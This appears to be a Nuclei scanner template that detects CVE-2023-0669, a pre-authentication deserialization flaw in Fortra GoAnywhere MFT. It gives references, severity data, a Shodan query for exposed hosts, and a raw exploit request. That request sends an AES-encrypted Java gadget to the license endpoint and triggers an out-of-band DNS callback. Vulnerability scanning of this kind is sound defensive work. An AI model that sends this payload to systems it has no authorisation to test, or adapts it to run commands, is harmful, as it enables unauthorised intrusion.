id: CVE-2023-0669 info: name: Fortra GoAnywhere MFT - Remote Code Execution author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch severity: high description: | Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1 - https://infosec.exchange/@briankrebs/109795710941843934 - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0669 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2023-0669 cwe-id: CWE-502 epss-score: 0.96578 epss-percentile: 0.99443 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer shodan-query: http.favicon.hash:1484947000 tags: cve,cve2023,rce,goanywhere,oast,kev http: - raw: - | POST /goanywhere/lic/accept HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")), base64_decode("Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo="), base64_decode("QUVTL0NCQy9QS0NTNVBhZA==")))), '$2')}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - 'GoAnywhere' - type: status status: - 500